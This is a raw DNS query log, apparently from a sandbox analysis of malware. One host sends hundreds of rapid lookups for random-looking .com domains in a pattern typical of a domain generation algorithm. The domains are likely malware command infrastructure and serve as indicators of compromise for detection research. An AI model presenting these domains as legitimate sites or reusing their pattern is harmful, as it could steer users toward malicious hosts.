                                                                                                                                                                                                          Sep 8, 2024 10:54:26.302582979 CEST192.168.2.91.1.1.10x8807Standard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.304166079 CEST192.168.2.91.1.1.10xa04dStandard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.306895971 CEST192.168.2.91.1.1.10x9928Standard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.309073925 CEST192.168.2.91.1.1.10x5d42Standard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.310781002 CEST192.168.2.91.1.1.10xdd34Standard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.312525988 CEST192.168.2.91.1.1.10xcca1Standard query (0)qekyryp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.314054012 CEST192.168.2.91.1.1.10x3b58Standard query (0)vonycaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.319751024 CEST192.168.2.91.1.1.10x2654Standard query (0)lysygij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.321154118 CEST192.168.2.91.1.1.10xe030Standard query (0)pumycav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.324807882 CEST192.168.2.91.1.1.10xf15fStandard query (0)qedyhiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.325037003 CEST192.168.2.91.1.1.10x904Standard query (0)volyrut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.328284979 CEST192.168.2.91.1.1.10xf398Standard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.332585096 CEST192.168.2.91.1.1.10xfeabStandard query (0)galyryz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.344419003 CEST192.168.2.91.1.1.10x7669Standard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.353468895 CEST192.168.2.91.1.1.10xc572Standard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.353955984 CEST192.168.2.91.1.1.10x7448Standard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.359836102 CEST192.168.2.91.1.1.10x815bStandard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.360022068 CEST192.168.2.91.1.1.10xd55Standard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.386456013 CEST192.168.2.91.1.1.10xc619Standard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.401254892 CEST192.168.2.91.1.1.10xd16cStandard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.402539968 CEST192.168.2.91.1.1.10x7418Standard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.402895927 CEST192.168.2.91.1.1.10xc795Standard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.404690027 CEST192.168.2.91.1.1.10x814Standard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.404901981 CEST192.168.2.91.1.1.10x836bStandard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.406209946 CEST192.168.2.91.1.1.10xb0d5Standard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.406730890 CEST192.168.2.91.1.1.10xad11Standard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.407949924 CEST192.168.2.91.1.1.10x7432Standard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.408858061 CEST192.168.2.91.1.1.10x764aStandard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.412215948 CEST192.168.2.91.1.1.10xff65Standard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.713274956 CEST192.168.2.91.1.1.10x6f6eStandard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.714299917 CEST192.168.2.91.1.1.10x9a9cStandard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.715717077 CEST192.168.2.91.1.1.10xfc0fStandard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.716388941 CEST192.168.2.91.1.1.10xbf6bStandard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.717216015 CEST192.168.2.91.1.1.10x459eStandard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.717876911 CEST192.168.2.91.1.1.10x2156Standard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.717895031 CEST192.168.2.91.1.1.10x8d11Standard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.718163967 CEST192.168.2.91.1.1.10x1b2Standard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.718209028 CEST192.168.2.91.1.1.10xf2b8Standard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.718494892 CEST192.168.2.91.1.1.10x96deStandard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.718539953 CEST192.168.2.91.1.1.10x9b31Standard query (0)vopymit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.718753099 CEST192.168.2.91.1.1.10xece8Standard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.718862057 CEST192.168.2.91.1.1.10xc805Standard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.718988895 CEST192.168.2.91.1.1.10x7ca1Standard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.719158888 CEST192.168.2.91.1.1.10x555aStandard query (0)lymyfyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.719297886 CEST192.168.2.91.1.1.10x2831Standard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.719465971 CEST192.168.2.91.1.1.10xd95Standard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.719589949 CEST192.168.2.91.1.1.10x3507Standard query (0)vowyguf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.719846010 CEST192.168.2.91.1.1.10x3ffcStandard query (0)qebysaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.720093012 CEST192.168.2.91.1.1.10x1862Standard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.720267057 CEST192.168.2.91.1.1.10x31d7Standard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.720578909 CEST192.168.2.91.1.1.10x283Standard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.720632076 CEST192.168.2.91.1.1.10xc75eStandard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.720858097 CEST192.168.2.91.1.1.10x3b32Standard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.720926046 CEST192.168.2.91.1.1.10x9485Standard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.721359015 CEST192.168.2.91.1.1.10xa407Standard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.721416950 CEST192.168.2.91.1.1.10x3cfdStandard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.722204924 CEST192.168.2.91.1.1.10xb838Standard query (0)qedyqal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.722606897 CEST192.168.2.91.1.1.10x90e9Standard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.722910881 CEST192.168.2.91.1.1.10x6a8aStandard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.739723921 CEST192.168.2.91.1.1.10x9114Standard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.740381002 CEST192.168.2.91.1.1.10xa815Standard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.740799904 CEST192.168.2.91.1.1.10x49f8Standard query (0)galyzus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.742682934 CEST192.168.2.91.1.1.10x9914Standard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.742858887 CEST192.168.2.91.1.1.10x5e38Standard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.854295015 CEST192.168.2.91.1.1.10xc542Standard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.855746031 CEST192.168.2.91.1.1.10x14d7Standard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.855984926 CEST192.168.2.91.1.1.10xb8caStandard query (0)vonypic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.858316898 CEST192.168.2.91.1.1.10x960aStandard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.864634991 CEST192.168.2.91.1.1.10xf6cfStandard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.874291897 CEST192.168.2.91.1.1.10x868bStandard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.881200075 CEST192.168.2.91.1.1.10xe0d9Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.881568909 CEST192.168.2.91.1.1.10xd37eStandard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.881825924 CEST192.168.2.91.1.1.10xcaccStandard query (0)qedyfyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.888269901 CEST192.168.2.91.1.1.10xaf91Standard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.894507885 CEST192.168.2.91.1.1.10x9666Standard query (0)galykew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.900573969 CEST192.168.2.91.1.1.10x14f7Standard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.905102015 CEST192.168.2.91.1.1.10xce0Standard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.906990051 CEST192.168.2.91.1.1.10x15d9Standard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.907078981 CEST192.168.2.91.1.1.10x9cbeStandard query (0)lymysox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.907321930 CEST192.168.2.91.1.1.10x7b0cStandard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.907674074 CEST192.168.2.91.1.1.10x63dcStandard query (0)puzylyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.909966946 CEST192.168.2.91.1.1.10x1191Standard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.910754919 CEST192.168.2.91.1.1.10x65b4Standard query (0)qedynug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.911592960 CEST192.168.2.91.1.1.10x8570Standard query (0)qegyqov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.922990084 CEST192.168.2.91.1.1.10x292dStandard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.923233986 CEST192.168.2.91.1.1.10x7719Standard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.923429966 CEST192.168.2.91.1.1.10x8cc2Standard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.923675060 CEST192.168.2.91.1.1.10x1437Standard query (0)qebytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.924724102 CEST192.168.2.91.1.1.10x23cStandard query (0)pumypop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.928693056 CEST192.168.2.91.1.1.10xdeb3Standard query (0)gahyqas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.930879116 CEST192.168.2.91.1.1.10xf840Standard query (0)gatyfuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.932220936 CEST192.168.2.91.1.1.10xf882Standard query (0)volykek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.932612896 CEST192.168.2.91.1.1.10x9082Standard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.933082104 CEST192.168.2.91.1.1.10x528fStandard query (0)lyvyxin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.934230089 CEST192.168.2.91.1.1.10xe17dStandard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.934617043 CEST192.168.2.91.1.1.10x1c7eStandard query (0)pujywep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.935111046 CEST192.168.2.91.1.1.10x90efStandard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.941741943 CEST192.168.2.91.1.1.10x39b0Standard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.942698002 CEST192.168.2.91.1.1.10xbf0eStandard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.943680048 CEST192.168.2.91.1.1.10x87adStandard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.948909044 CEST192.168.2.91.1.1.10x1bb0Standard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.949147940 CEST192.168.2.91.1.1.10x3f9dStandard query (0)gacyryb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.949393988 CEST192.168.2.91.1.1.10x3792Standard query (0)lygygux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.950789928 CEST192.168.2.91.1.1.10x983Standard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.950937033 CEST192.168.2.91.1.1.10x8b5dStandard query (0)ganypis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.951131105 CEST192.168.2.91.1.1.10xc55Standard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.951280117 CEST192.168.2.91.1.1.10xb32Standard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.951514006 CEST192.168.2.91.1.1.10x2828Standard query (0)qegyhip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.952007055 CEST192.168.2.91.1.1.10x3730Standard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.955869913 CEST192.168.2.91.1.1.10x619bStandard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.956211090 CEST192.168.2.91.1.1.10x6038Standard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.956396103 CEST192.168.2.91.1.1.10x2204Standard query (0)gadynub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.956551075 CEST192.168.2.91.1.1.10x7989Standard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.956715107 CEST192.168.2.91.1.1.10x3b0fStandard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.956969976 CEST192.168.2.91.1.1.10x981dStandard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.957205057 CEST192.168.2.91.1.1.10x971fStandard query (0)qeqysap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.959494114 CEST192.168.2.91.1.1.10xf8a0Standard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.960231066 CEST192.168.2.91.1.1.10x1a1bStandard query (0)puvytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.960555077 CEST192.168.2.91.1.1.10x3e25Standard query (0)lyvytud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.960833073 CEST192.168.2.91.1.1.10x5899Standard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.961178064 CEST192.168.2.91.1.1.10x2258Standard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.961724043 CEST192.168.2.91.1.1.10xb415Standard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.963481903 CEST192.168.2.91.1.1.10x2a9aStandard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.964118004 CEST192.168.2.91.1.1.10x3992Standard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.964493990 CEST192.168.2.91.1.1.10x8bb7Standard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.964915991 CEST192.168.2.91.1.1.10x84bbStandard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.965015888 CEST192.168.2.91.1.1.10x9bd5Standard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.313127041 CEST192.168.2.91.1.1.10x21a9Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.314013958 CEST192.168.2.91.1.1.10xff85Standard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.315570116 CEST192.168.2.91.1.1.10x79f5Standard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.316030979 CEST192.168.2.91.1.1.10x7701Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.316401958 CEST192.168.2.91.1.1.10x7078Standard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.334367990 CEST192.168.2.91.1.1.10x1640Standard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.338774920 CEST192.168.2.91.1.1.10x4ffeStandard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.339107037 CEST192.168.2.91.1.1.10xce93Standard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.339850903 CEST192.168.2.91.1.1.10x61a1Standard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.342432022 CEST192.168.2.91.1.1.10x2dfeStandard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.344336033 CEST192.168.2.91.1.1.10x427eStandard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.351192951 CEST192.168.2.91.1.1.10x2704Standard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.356441975 CEST192.168.2.91.1.1.10xd6b2Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.356815100 CEST192.168.2.91.1.1.10x1bacStandard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.358973980 CEST192.168.2.91.1.1.10x3ac8Standard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.363094091 CEST192.168.2.91.1.1.10x86a1Standard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.364815950 CEST192.168.2.91.1.1.10xecc1Standard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.365056992 CEST192.168.2.91.1.1.10x9b3dStandard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.376663923 CEST192.168.2.91.1.1.10x9139Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.376862049 CEST192.168.2.91.1.1.10xca10Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.377165079 CEST192.168.2.91.1.1.10x1b12Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.377312899 CEST192.168.2.91.1.1.10x92d7Standard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.377981901 CEST192.168.2.91.1.1.10x7d05Standard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.378134012 CEST192.168.2.91.1.1.10x65e7Standard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.382519007 CEST192.168.2.91.1.1.10x6186Standard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.382704973 CEST192.168.2.91.1.1.10x36a4Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.382968903 CEST192.168.2.91.1.1.10xe7dStandard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.383120060 CEST192.168.2.91.1.1.10xf306Standard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.389816046 CEST192.168.2.91.1.1.10x304Standard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.401654959 CEST192.168.2.91.1.1.10x86a6Standard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.401834965 CEST192.168.2.91.1.1.10x585bStandard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.401947021 CEST192.168.2.91.1.1.10x92fcStandard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.402885914 CEST192.168.2.91.1.1.10xcecdStandard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.403137922 CEST192.168.2.91.1.1.10xd4e7Standard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.403366089 CEST192.168.2.91.1.1.10x89ceStandard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.403523922 CEST192.168.2.91.1.1.10xb332Standard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.403667927 CEST192.168.2.91.1.1.10xe80bStandard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.403804064 CEST192.168.2.91.1.1.10xd488Standard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.403954983 CEST192.168.2.91.1.1.10x8fb7Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.404081106 CEST192.168.2.91.1.1.10xeb9eStandard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.404306889 CEST192.168.2.91.1.1.10xaa68Standard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.404496908 CEST192.168.2.91.1.1.10x9b14Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.407900095 CEST192.168.2.91.1.1.10x291aStandard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.408166885 CEST192.168.2.91.1.1.10x646eStandard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.408374071 CEST192.168.2.91.1.1.10x3779Standard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.408922911 CEST192.168.2.91.1.1.10x5e09Standard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.409096956 CEST192.168.2.91.1.1.10xc5Standard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.409326077 CEST192.168.2.91.1.1.10xf298Standard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.409533024 CEST192.168.2.91.1.1.10xcfbaStandard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.409710884 CEST192.168.2.91.1.1.10xb3f6Standard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.409882069 CEST192.168.2.91.1.1.10xf84bStandard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.410041094 CEST192.168.2.91.1.1.10x239Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.410178900 CEST192.168.2.91.1.1.10x9a0cStandard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.410485029 CEST192.168.2.91.1.1.10x98fbStandard query (0)pufybyl.comA (IP address)IN (0x0001)false
